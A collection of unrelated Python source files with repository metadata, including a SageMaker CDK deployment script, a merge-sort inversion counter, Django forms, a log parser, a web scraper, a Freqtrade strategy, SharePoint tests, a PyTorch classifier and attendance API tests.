p = registry.get_latest_approved_packages(package_group_name, max_results=1)[0]
deployment_config.variant_config = VariantConfig(
model_package_version=p["ModelPackageVersion"],
model_package_arn=p["ModelPackageArn"],
initial_variant_weight=1,
instance_count=deployment_config.instance_count,
instance_type=deployment_config.instance_type,
)
else:
# Get the versioned package and update ARN
version = deployment_config.variant_config.model_package_version
logger.info(f"Selecting variant version {version}")
p = registry.get_versioned_approved_packages(
package_group_name,
model_package_versions=[version],
)[0]
deployment_config.variant_config.model_package_arn = p["ModelPackageArn"]
# Get the pipeline execution to get the baseline uri, for passing into
pipeline_execution_arn = registry.get_pipeline_execution_arn(
deployment_config.variant_config.model_package_arn
)
baseline_uri = registry.get_processing_output(pipeline_execution_arn)
logger.info(f"Got baseline uri: {baseline_uri}")
data_capture_uri = f"s3://{artifact_bucket}/{project_id}/datacapture"
logger.info(f"Got data capture uri: {data_capture_uri}")
reporting_uri = f"s3://{artifact_bucket}/{project_id}/monitoring"
logger.info(f"Got reporting uri: {reporting_uri}")
return SageMakerStack(
app,
f"drift-deploy-{stage_name}",
sagemaker_execution_role=sagemaker_execution_role,
deployment_config=deployment_config,
endpoint_name=endpoint_name,
baseline_uri=baseline_uri,
data_capture_uri=data_capture_uri,
reporting_uri=reporting_uri,
tags=tags,
)
def main(
project_name: str,
project_id: str,
sagemaker_execution_role: str,
artifact_bucket: str,
):
# Create App and stacks
app = core.App()
# Create two different stages for staging and prod
create_endpoint(
app,
project_name=project_name,
project_id=project_id,
sagemaker_execution_role=sagemaker_execution_role,
artifact_bucket=artifact_bucket,
stage_name="staging",
)
create_endpoint(
app,
project_name=project_name,
project_id=project_id,
sagemaker_execution_role=sagemaker_execution_role,
artifact_bucket=artifact_bucket,
stage_name="prod",
)
app.synth()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Load parameters")
parser.add_argument(
"--project-name",
default=os.environ.get("SAGEMAKER_PROJECT_NAME"),
)
parser.add_argument("--project-id", default=os.environ.get("SAGEMAKER_PROJECT_ID"))
parser.add_argument(
"--sagemaker-execution-role",
default=os.environ.get("SAGEMAKER_EXECUTION_ROLE_ARN"),
)
parser.add_argument(
"--artifact-bucket",
default=os.environ.get("ARTIFACT_BUCKET"),
)
args = vars(parser.parse_args())
print("args: {}".format(args))
main(**args)
| [
"brightsparc@gmail.com"
] | brightsparc@gmail.com |
0534f06fd3773119e60cd20e503f027d74b7b8a9 | 97b6fae3c84c7f469357e19a88ef3869eb68c2ad | /countinversion.py | 2db8e830c61f421770394ca7feac57336db916b5 | [] | no_license | shuric80/Algorithm-for-Counting-Inversions | b48265fa3578d1a2bb3b1ccbe41c9b40173bc5cf | 691ed3d8970c46c66f92dad101b721e5764ceb44 | refs/heads/main | 2023-04-11T09:19:33.805859 | 2021-04-29T05:54:04 | 2021-04-29T05:54:04 | 362,703,175 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 983 | py | import sys
from typing import List, Tuple
def merge(left: List[int], right: List[int],
mid: int) -> Tuple[List[int], int]:
i, j = 0, 0
cnt = 0
output = list()
while i < len(left) and j < len(right):
if left[i] < right[j]:
output.append(left[i])
i += 1
elif left[i] > right[j]:
output.append(right[j])
j += 1
cnt += (mid - i)
output.extend(left[i:])
output.extend(right[j:])
return output, cnt
def count(l_input: List[int]) -> int:
if len(l_input) < 2:
return l_input[:], 0
middle = len(l_input) // 2
a, x = count(l_input[:middle])
b, y = count(l_input[middle:])
c, z = merge(a, b, middle)
return c, z + x + y,
if __name__ == '__main__':
with open('data.txt') as f:
data = f.read()
rows = [int(i) for i in data.split('\n') if i != '']
_, cnt = count(rows)
sys.stdout.write(f'Total count inversion: {cnt}')
| [
"noreply@github.com"
] | shuric80.noreply@github.com |
32bbda061e040728ba6143a2721c144d277bbc40 | 11c840ba7492f16d0d2501efb117ac39dced4424 | /badsound/forms.py | 84c9187a10b628170dcccfdb9ab6a6b6ced6533a | [] | no_license | t00n/badsound | c5f464886095d3567a89fee15cc69993a6e70454 | ba31a30a481dee7530260dfb646b04edbbbd49d3 | refs/heads/master | 2021-01-10T03:14:54.811389 | 2015-10-30T16:33:46 | 2015-10-30T16:33:46 | 45,058,765 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,118 | py | from django.forms import ModelForm, URLField, DateField, Form
from bootstrap3_datetime.widgets import DateTimePicker
from .models import Music, Vote
class AddMusicForm(ModelForm):
class Meta:
model = Music
fields = ['url']
class AddVoteForm(ModelForm):
class Meta:
model = Vote
fields = ['music1', 'music2', 'winner']
class ShowRankingForm(Form):
start_date = DateField(required=False, input_formats=['%d/%m/%Y'], widget=DateTimePicker(options={'format': 'DD/MM/YYYY', 'pickTime': False}))
end_date = DateField(required=False, input_formats=['%d/%m/%Y'], widget=DateTimePicker(options={'format': 'DD/MM/YYYY', 'pickTime': False}))
def clean(self):
cleaned_data = super(ShowRankingForm, self).clean()
start_date = cleaned_data.get("start_date")
end_date = cleaned_data.get("end_date")
status = cleaned_data.get("status")
if start_date and end_date:
if end_date < start_date:
raise forms.ValidationError(
"La date de fin ne peut etre avant la date de debut"
) | [
"kelkununtel@hotmail.com"
] | kelkununtel@hotmail.com |
bb918660688b08138dfff3f921550e5811812b22 | 6ed01f4503fc9de234a561c945adff7cf4b1c81b | /dcsTools/logTools/LogAnalizer.py | b87902b91912124b60bb08ef9caa08a1222ab954 | [] | no_license | ostwald/python-lib | b851943c913a68424a05ce3c7b42878ff9519f68 | 9acd97ffaa2f57b3e9e632e1b75016549beb29e5 | refs/heads/master | 2021-10-28T06:33:34.156095 | 2021-10-21T23:54:49 | 2021-10-21T23:54:49 | 69,060,616 | 0 | 1 | null | 2018-06-21T16:05:30 | 2016-09-23T21:04:46 | Roff | UTF-8 | Python | false | false | 2,332 | py | """
tool for analyzing catalina.out log files
e.g., "C:/Documents and Settings/ostwald/My Documents/DCS/Log Analysis/Catalina Logs/dcc-log.txt"
parses the log file and returns a list of Request objects
"""
import string
import sys
import os
import re
from time import strptime, strftime, gmtime, localtime, asctime, time, mktime
from Request import Request, logTimeToSecs
pat = re.compile ("\n\n")
def getRequests (path, filters=None):
"""
split the log file into "blobs" which are defined as chunks of text separated by a blank line
if the blob contains output from the RequestProcessor, create a Request object
optionally, a sessionID can be passed to look for Requests from that session only
"""
if type (filters) == type ("blah"):
filters = [filters]
s = open (path, 'r').read()
blobs = s.split ("\n\n")
print "processing %d blobs" % len (blobs)
requests = []
for blob in blobs:
line1 = blob.split("\n")[0]
if string.find (line1, "org.apache.struts.action.RequestProcessor process") != -1:
try:
request = Request (blob)
except:
print "failed to contstruct Request:", sys.exc_type, sys.exc_value
continue
if filters:
if (eval (string.join (filters, " and "))):
requests.append (request)
## accept = True
## for filter in filters:
## if not (eval (filter)):
## accept = False
## break
## if accept:
## requests.append (request)
else:
requests.append (request)
return requests
if __name__ == "__main__":
t1 = "Aug 12, 2005 12:00:01 AM"
t2 = "Aug 13, 2005 5:00:00 PM"
t1secs = logTimeToSecs (t1)
t2secs = logTimeToSecs (t2)
filters = None
path = "C:/Documents and Settings/ostwald/My Documents/DCS/Log Analysis/Catalina Logs/dcc-log.txt"
sessionId = "1DE5755F9DE662AD2D1615E23801027B"
filter1 = "request.sessionId == '%s'" % sessionId
filter2 = "request.time_stamp > %s and request.time_stamp < %s" % (t1secs, t2secs)
filter3 = "request.isStatusEvent()"
filters = (filter3,filter2)
requests = getRequests(path, filters)
if filters:
print "filters"
for f in filters:
print "\t" + f
print "%d requests extracted" % len (requests)
for i in range (min (len (requests), 10)):
print "\n-- %d / %d --\n%s" % ( i, len (requests), requests[i].log_entry)
## print "\n-- %d --%s" % ( i, requests[i].time_stamp)
| [
"ostwald@ucar.edu"
] | ostwald@ucar.edu |
f27e2f2cc8ef12eb3d323fbd3190a05d27836935 | 404a8596d3c4a55efe57e6fe5f2f19747a487e28 | /baekjoon/5565_receipt.py | aea7c94e573bc71e5e01f4d21b41b01260efb873 | [] | no_license | taehwan920/Algorithm | 370b72e48ba404ae1fb7a7786165b88a8daf090a | f837034d0c2f7cac370eb8cceacb8b3827ec62f9 | refs/heads/master | 2021-08-17T07:14:33.594428 | 2021-01-01T14:26:35 | 2021-01-01T14:26:35 | 237,892,425 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 68 | py | n = int(input())
for i in range(9):
n -= int(input())
print(n)
| [
"taehwan920@gmail.com"
] | taehwan920@gmail.com |
b00b4c70cd0f6c2cd2530dd2f1e490e5fb3a9388 | 748b17bfd33dbfc6d20b2373f3a11560450b8d52 | /scrape2.py | e935e89a3ae05a6a4b2fe30827a927795d70ac89 | [] | no_license | chrisgits/scraper | 1ced163b88106fe2eb1811eda627cf6f8937409f | 20d90c4d24afe98f552bce1efbee3c6ea6c9d99f | refs/heads/master | 2021-01-23T14:15:04.213265 | 2017-09-07T02:09:28 | 2017-09-07T02:09:28 | 102,679,731 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,331 | py | import bs4
import json
from urllib.request import urlopen as uReq
from bs4 import BeautifulSoup as soup
def writeToJSONFile(path, fileName, data):
filePathNameWExt = "./" + path + "/" + fileName + '.json'
with open(filePathNameWExt, 'w') as fp:
json.dump(data, fp)
#json file write
path = "./"
fileName = "2017roster"
my_url = "https://hailvarsity.com/nebraska-football/roster"
uClient = uReq(my_url) #opens conn and parses page into var
page_html = uClient.read() #reads page into var
uClient.close() #closes conn
#parse HTML into page_soup var
page_soup = soup(page_html, "html.parser")
#find the class that has the roster table data
players = page_soup.findAll("div", {"class":"row"})
#loop over each row to find player data
for player in players:
number_tag = player.find("div", class_="number")
number = number_tag.text.strip()
name_tag = player.find("div", class_="name")
name = name_tag.contents[1].text
position_tag = player.find("div", class_="position")
position = position_tag.text.strip()
photo_div = player.find("img", class_="mug")
photo_url = photo_div["src"]
year = player.find("span", class_="class-long").text
data = {"number":number, "name":name, "position":position, "mug_url":photo_url,"year":year}
writeToJSONFile(path, fileName, data)
| [
"cmannel77@gmail.com"
] | cmannel77@gmail.com |
f08b46d1aad2ae8911316c4e7164b6e1920f3dc8 | 54b52db8e81ef9c8ac6d0a78a387a51e613124d7 | /virtual/bin/chardetect | 85a78d7dcef37770191a811a3ec9865ef65301f5 | [
"MIT"
] | permissive | virginiah2020/Instagram | 749eacf32d6d7e916d46fb1ecb6a7522e9017743 | fa7abee248f28daea1b532b9eef1fd859ca718d2 | refs/heads/master | 2022-12-10T17:28:31.440559 | 2020-08-24T12:35:14 | 2020-08-24T12:35:14 | 288,934,042 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 285 | #!/home/moringa-school-1063/Desktop/Instagram-Clone-master/virtual/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from chardet.cli.chardetect import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"vancyvy254@gmail.com"
] | vancyvy254@gmail.com | |
1e927f176dc02de18d93a195674c83f0a96b7dad | 121e7e11e7a9b0bf1f017715bc50974397c23c47 | /models.py | 3adffd8b155368f045015cf4cbcc4318fd21febc | [] | no_license | ChaiBapchya/dl_radiologist | 8ed119ca8da1a2a49dfa081464a0f934fa7a771b | 5bb81bb8134944e74ee221bf5f86c43ce5c9e8e0 | refs/heads/master | 2020-05-26T21:37:49.139713 | 2019-08-18T00:08:44 | 2019-08-18T00:08:44 | 188,382,402 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,835 | py | import torch
import torch.nn as nn
class Network(nn.Module):
def __init__(self):
super(Network, self).__init__()
# Adjust values according to image size
self.features = nn.Sequential(
nn.Conv2d(in_channels=1, out_channels=6, kernel_size=9, stride=1, padding=0, bias=False),
nn.BatchNorm2d(num_features=6),
nn.MaxPool2d(kernel_size=2, stride=2, padding=0),
nn.ReLU(),
nn.Conv2d(in_channels=6, out_channels=11, kernel_size=5, stride=1, padding=0, bias=False),
nn.BatchNorm2d(num_features=11),
nn.MaxPool2d(kernel_size=4, stride=2, padding=0),
nn.ReLU(),
nn.Dropout(p=0.25),
nn.Conv2d(in_channels=11, out_channels=12, kernel_size=9, stride=1, padding=0),
nn.MaxPool2d(kernel_size=4, stride=3, padding=0),
nn.ReLU()
)
self.classifier = nn.Sequential(
nn.Linear(400*12, 30*14),
nn.Dropout(p=0.3),
nn.ReLU(),
nn.Linear(30*14, 14)
)
# Is Initializing needed?
for name, m in self.named_modules():
if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):
# Initializing weights with randomly sampled numbers from a normal
# distribution.
m.weight.data.normal_(0, 1)
m.weight.data.mul_(1e-2)
if m.bias is not None:
# Initializing biases with zeros.
nn.init.constant_(m.bias.data, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.bias.data, 0)
nn.init.constant_(m.weight.data, 1)
def forward(self, x):
feat = self.features(x)
feat = feat.view(-1,400*12)
op = self.classifier(feat)
return op.squeeze()
| [
"chai.bapat@gmail.com"
] | chai.bapat@gmail.com |
6dbe367d617ed99fe5dba405b67d30a3daaf7ff8 | 6fa30fbbfd2876db0e2f5c86a2af5d48bcf474de | /Maro4h_Macd_Sd.py | 3a3d1f6f783d91bb89ac75c7ecfc6a2ba31e6d4e | [
"MIT"
] | permissive | AhmedSakrr/Freqtrade_strategies-2 | bcc1c21221d884a0cf6446fb6f45e50fe1b93e13 | b6b4c1a236584f5369462469c62e69b09253c3b6 | refs/heads/main | 2023-04-12T16:49:01.906026 | 2021-05-18T13:20:24 | 2021-05-18T13:20:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,564 | py | # --- Do not remove these libs ---
from freqtrade.strategy.interface import IStrategy
from typing import Dict, List
from functools import reduce
from pandas import DataFrame
# --------------------------------
import datetime
import talib.abstract as ta
import freqtrade.vendor.qtpylib.indicators as qtpylib
import numpy as np # noqa
class Maro4hMacdSd(IStrategy):
max_open_trades = 1
stake_amount = 500
# Minimal ROI designed for the strategy.
# This attribute will be overridden if the config file contains "minimal_roi"
stoploss = -0.21611
minimal_roi = {
"0": 0.24627,
"24": 0.06484,
"38": 0.02921,
"145": 0
}
# Optimal timeframe for the strategy
timeframe = '5m'
# trailing stoploss
trailing_stop = False
trailing_stop_positive = 0.1
trailing_stop_positive_offset = 0.2
# run "populate_indicators" only for new candle
process_only_new_candles = True
# Experimental settings (configuration will overide these if set)
use_sell_signal = True
sell_profit_only = False
ignore_roi_if_buy_signal = False
# Optional order type mapping
order_types = {
'buy': 'limit',
'sell': 'limit',
'stoploss': 'market',
'stoploss_on_exchange': False
}
def populate_indicators(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
"""
Adds several different TA indicators to the given DataFrame
Performance Note: For the best performance be frugal on the number of indicators
you are using. Let uncomment only the indicator you are using in your strategies
or your hyperopt configuration, otherwise you will waste your memory and CPU usage.
"""
# MACD
macd = ta.MACD(dataframe,fastperiod=12, slowperiod=26, signalperiod=9)
dataframe['macd'] = macd['macd']
dataframe['macdsignal'] = macd['macdsignal']
dataframe['macdhist'] = 100*macd['macdhist']/dataframe['close']
dataframe['corr'] = ta.STDDEV(dataframe, timeperiod=28)
dataframe['corr_mean'] = ta.MA(dataframe['corr'], timeperiod=28)
dataframe['corr_sell'] = ta.STDDEV(dataframe, timeperiod=28)
dataframe['corr_mean_sell'] = ta.MA(dataframe['corr'], timeperiod=28)
return dataframe
def populate_buy_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
"""
Based on TA indicators, populates the buy signal for the given dataframe
:param dataframe: DataFrame
:return: DataFrame with buy column
"""
dataframe.loc[
(
(dataframe['macdhist'] < 0) &
(dataframe['macdhist'].shift(2) > dataframe['macdhist'].shift(1))
& (dataframe['macdhist'] > dataframe['macdhist'].shift(2))
&
(dataframe['corr'] > dataframe['corr_mean'])
),'buy'] = 1
return dataframe
def populate_sell_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
"""
Based on TA indicators, populates the sell signal for the given dataframe
:param dataframe: DataFrame
:return: DataFrame with buy column
"""
dataframe.loc[
(
(dataframe['macdhist'] > 0) &
(dataframe['macdhist'].shift(2) < dataframe['macdhist'].shift(1))
&(dataframe['macdhist'] < dataframe['macdhist'].shift(2)) &
(dataframe['corr_sell'] < dataframe['corr_mean_sell'])
),'sell'] = 1
return dataframe | [
"34077513+Kamelchahbi@users.noreply.github.com"
] | 34077513+Kamelchahbi@users.noreply.github.com |
71d201020a8661345685b3fe0dcde8ba8c88b1f4 | 49ba5356bdc5df7dd9803b56fe507c5164a90716 | /plus-one/test_solution.py | 574ad18d65637674d36fc84b6ad97ac231f5ded6 | [] | no_license | uxlsl/leetcode_practice | d80ad481c9d8ee71cce0f3c66e98446ced149635 | d8ed762d1005975f0de4f07760c9671195621c88 | refs/heads/master | 2021-04-25T18:12:28.136504 | 2020-03-11T07:54:15 | 2020-03-11T07:54:15 | 121,472,384 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 243 | py | from solution import Solution
def test_solution():
s = Solution()
assert s.plusOne([1]) == [2]
assert s.plusOne([1, 2, 3]) == [1, 2, 4]
assert s.plusOne([1, 2, 9]) == [1, 3, 0]
assert s.plusOne([9, 9, 9]) == [1, 0, 0, 0]
| [
"songlin.lin@yundata.com"
] | songlin.lin@yundata.com |
d4dcf28a56df6392227f886cba49f02edc0a4425 | 9152c6f5b692694c4cb95725319fc8dd21d30455 | /tests/test_sharepoint_group.py | 35ff7ddb18dd00b39d3d1f90d47262fff460b3cf | [
"MIT"
] | permissive | VISIN9/Office365-REST-Python-Client | cf3de86a6bdd2461ff5814dbfa02d4d4185917d5 | 91c07d427a76197f6eb143c6253bdc832cbb889d | refs/heads/master | 2021-05-25T08:43:35.530546 | 2020-04-06T20:24:53 | 2020-04-06T20:24:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,336 | py | from tests.sharepoint_case import SPTestCase
class TestSharePointGroup(SPTestCase):
@classmethod
def setUpClass(cls):
super(TestSharePointGroup, cls).setUpClass()
cls.target_user_name = "i:0#.f|membership|mdoe@mediadev8.onmicrosoft.com"
target_group_name = "Communication site Visitors"
cls.target_group = cls.client.web.siteGroups.get_by_name(target_group_name)
def test1_get_current_user_groups(self):
groups = self.client.web.currentUser.groups
self.client.load(groups)
self.client.execute_query()
self.assertGreaterEqual(len(groups), 0)
def test2_add_user_to_group(self):
target_user = self.target_group.users.add_user(self.target_user_name)
self.client.execute_query()
self.assertIsNotNone(target_user.properties['Id'])
def test3_delete_user_from_group(self):
target_users = self.target_group.users
self.client.load(target_users)
self.client.execute_query()
users_count_before = len(target_users)
self.assertGreater(users_count_before, 0)
user_id = target_users[0].properties['Id']
target_users.remove_by_id(user_id)
self.client.load(target_users)
self.client.execute_query()
self.assertEqual(users_count_before, len(target_users) + 1)
| [
"vvgrem@gmail.com"
] | vvgrem@gmail.com |
edee59048bf7db2a486cc4da27fba9608ec32e7a | 909ae0ab0f4fe78de433c3d72b34b84848303ee8 | /lending-club/venv/bin/jupyter-kernel | d0fe4631191e2897d3d90fd697e3b7c5e8f6b55c | [] | no_license | jakekasan/data-science | f5cf2a7c0ead56e04a3549b930ca974495faae49 | 4bf589c268c517525abf3170c24cf42e0ae872cf | refs/heads/master | 2021-09-17T21:18:51.278247 | 2018-07-05T07:31:51 | 2018-07-05T07:31:51 | 114,106,343 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 280 | #!/Users/jakubkasan/coding/data-science/lending-club/venv/bin/python3.6
# -*- coding: utf-8 -*-
import re
import sys
from jupyter_client.kernelapp import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"jake.kasan@gmail.com"
] | jake.kasan@gmail.com | |
384b044a26741c3691f5aad15dccf32d43789fcd | 184310f55b58e854dc3b6c58599ef99bc4c95739 | /hujian_api/API_service/TestCase/Attendance_analyse_late_02.py | f08ad74fb962f34245281fa4384265995c3344b0 | [] | no_license | tanjijun1/Python_API | c8585821a627c399fea1ab31bb024be6b82dd3ab | 3c4771875870ffe425d2d39fc28a50449b1752f2 | refs/heads/master | 2023-01-07T23:30:30.284433 | 2020-11-11T08:43:10 | 2020-11-11T08:43:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,314 | py | import pytest
import allure
import requests
import json
import time
from Params.params import Login
from Params.params import Login_info
from Params.params import Password_reset
from Params.params import Log_info
from Params.params import Log_latest
from Params.params import Log_list
from Params.params import Attendance_groups_sync
from Params.params import Attendance_schedules_sync
from Params.params import Attendance_records_sync
from Params.params import Flow_sync
from Params.params import Department_sync
from Params.params import Department_list
from Params.params import Department_employees_list
from Params.params import Department_employee_query
from Params.params import Attendance_class_list
from Params.params import Attendance_analyse
from Params.params import Attendance_analyse_result
from Params.params import Attendance_analyse_result_statistics
from Common import Post
from Common import Get
from Common import Assert
from Common import Consts
class Attendance_analyse_late_02:
@allure.severity('normal')
@allure.feature('Attendance_analyse')
@allure.story('Attendance_analyse_late')
def test_late_02(self):
session_a = requests.session()
get_req = Get.Get()
ass = Assert.Assertions()
url_2019_10 = 'http://172.16.2.101:4000/api/attendance/analyse?startDate=2019-10-01 00:00:00&endDate=2019-10-31 00:00:00&userIds=056621220036405378'
#分析 用户056621220036405378 2019年10月 考勤
res_2019_10 = get_req.get_model_a(session_a,url_2019_10)
time.sleep(10)
resCode_2019_10 = res_2019_10['code']
resText_2019_10 = res_2019_10['text']
#print(resText_2019_10)
assert ass.assert_code(resCode_2019_10, 200)
assert ass.assert_in_text(resText_2019_10, 'ok')
Consts.RESULT_LIST.append('True')
url_2019_11 = 'http://172.16.2.101:4000/api/attendance/analyse?startDate=2019-11-01 00:00:00&endDate=2019-11-30 00:00:00&userIds=056621220036405378'
# 分析 用户056621220036405378 2019年11月 考勤
res_2019_11 = get_req.get_model_a(session_a, url_2019_11)
time.sleep(10)
resCode_2019_11 = res_2019_11['code']
resText_2019_11 = res_2019_11['text']
#print(resText_2019_11)
assert ass.assert_code(resCode_2019_11, 200)
assert ass.assert_in_text(resText_2019_11, 'ok')
Consts.RESULT_LIST.append('True')
url_2019_12 = 'http://172.16.2.101:4000/api/attendance/analyse?startDate=2019-12-01 00:00:00&endDate=2019-12-31 00:00:00&userIds=056621220036405378'
# 分析 用户056621220036405378 2019年12月 考勤
res_2019_12 = get_req.get_model_a(session_a, url_2019_12)
time.sleep(10)
resCode_2019_12 = res_2019_12['code']
resText_2019_12 = res_2019_12['text']
#print(resText_2019_12)
assert ass.assert_code(resCode_2019_12, 200)
assert ass.assert_in_text(resText_2019_12, 'ok')
Consts.RESULT_LIST.append('True')
url_result_2019_10 = 'http://172.16.2.101:4000/api/attendance/analyse/list?userId=056621220036405378&startDate=2019-10-01 00:00:00&endDate=2019-10-31 00:00:00&pageSize=31'
#获取 用户056621220036405378 2019年10月 考勤分析结果
res_result_2019_10 = get_req.get_model_a(session_a,url_result_2019_10)
res_resultCode_2019_10 = res_result_2019_10['code']
res_resultText_2019_10 = res_result_2019_10['text']
assert ass.assert_code(res_resultCode_2019_10, 200)
assert ass.assert_in_text(res_resultText_2019_10, 'ok')
Consts.RESULT_LIST.append('True')
url_result_2019_11 = 'http://172.16.2.101:4000/api/attendance/analyse/list?userId=056621220036405378&startDate=2019-11-01 00:00:00&endDate=2019-11-30 00:00:00&pageSize=31'
# 获取 用户056621220036405378 2019年11月 考勤分析结果
res_result_2019_11 = get_req.get_model_a(session_a, url_result_2019_11)
res_resultCode_2019_11 = res_result_2019_11['code']
res_resultText_2019_11 = res_result_2019_11['text']
assert ass.assert_code(res_resultCode_2019_11, 200)
assert ass.assert_in_text(res_resultText_2019_11, 'ok')
Consts.RESULT_LIST.append('True')
url_result_2019_12 = 'http://172.16.2.101:4000/api/attendance/analyse/list?userId=056621220036405378&startDate=2019-12-01 00:00:00&endDate=2019-12-31 00:00:00&pageSize=31'
# 获取 用户056621220036405378 2019年12月 考勤分析结果
res_result_2019_12 = get_req.get_model_a(session_a, url_result_2019_12)
res_resultCode_2019_12 = res_result_2019_12['code']
res_resultText_2019_12 = res_result_2019_12['text']
assert ass.assert_code(res_resultCode_2019_12, 200)
assert ass.assert_in_text(res_resultText_2019_12, 'ok')
Consts.RESULT_LIST.append('True')
res_resultDict_2019_10 = json.loads(res_resultText_2019_10)
resInfo_10_01 = res_resultDict_2019_10['result']['list'][0]
resInfo_10_02 = res_resultDict_2019_10['result']['list'][1]
resInfo_10_03 = res_resultDict_2019_10['result']['list'][2]
resInfo_10_04 = res_resultDict_2019_10['result']['list'][3]
resInfo_10_05 = res_resultDict_2019_10['result']['list'][4]
resInfo_10_06 = res_resultDict_2019_10['result']['list'][5]
resInfo_10_07 = res_resultDict_2019_10['result']['list'][6]
resInfo_10_08 = res_resultDict_2019_10['result']['list'][7]
resInfo_10_09 = res_resultDict_2019_10['result']['list'][8]
resInfo_10_10 = res_resultDict_2019_10['result']['list'][9]
resInfo_10_11 = res_resultDict_2019_10['result']['list'][10]
resInfo_10_12 = res_resultDict_2019_10['result']['list'][11]
resInfo_10_13 = res_resultDict_2019_10['result']['list'][12]
resInfo_10_14 = res_resultDict_2019_10['result']['list'][13]
resInfo_10_15 = res_resultDict_2019_10['result']['list'][14]
resInfo_10_16 = res_resultDict_2019_10['result']['list'][15]
resInfo_10_17 = res_resultDict_2019_10['result']['list'][16]
resInfo_10_18 = res_resultDict_2019_10['result']['list'][17]
resInfo_10_19 = res_resultDict_2019_10['result']['list'][18]
resInfo_10_20 = res_resultDict_2019_10['result']['list'][19]
resInfo_10_21 = res_resultDict_2019_10['result']['list'][20]
resInfo_10_22 = res_resultDict_2019_10['result']['list'][21]
resInfo_10_23 = res_resultDict_2019_10['result']['list'][22]
resInfo_10_24 = res_resultDict_2019_10['result']['list'][23]
resInfo_10_25 = res_resultDict_2019_10['result']['list'][24]
resInfo_10_26 = res_resultDict_2019_10['result']['list'][25]
resInfo_10_27 = res_resultDict_2019_10['result']['list'][26]
resInfo_10_28 = res_resultDict_2019_10['result']['list'][27]
resInfo_10_29 = res_resultDict_2019_10['result']['list'][28]
resInfo_10_30 = res_resultDict_2019_10['result']['list'][29]
resInfo_10_31 = res_resultDict_2019_10['result']['list'][30]
assert ass.assert_in_text(resInfo_10_01, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_02, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_03, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_04, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_05, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_06, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_07, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_08, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_09, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_10, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_11, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_12, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_13, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_14, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_15, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_16, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_17, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_18, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_19, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_20, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_21, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_22, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_23, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_24, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_25, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_26, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_27, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_28, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_29, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_30, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_31, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
res_resultDict_2019_11 = json.loads(res_resultText_2019_11)
resInfo_11_01 = res_resultDict_2019_11['result']['list'][0]
resInfo_11_02 = res_resultDict_2019_11['result']['list'][1]
resInfo_11_03 = res_resultDict_2019_11['result']['list'][2]
resInfo_11_04 = res_resultDict_2019_11['result']['list'][3]
resInfo_11_05 = res_resultDict_2019_11['result']['list'][4]
resInfo_11_06 = res_resultDict_2019_11['result']['list'][5]
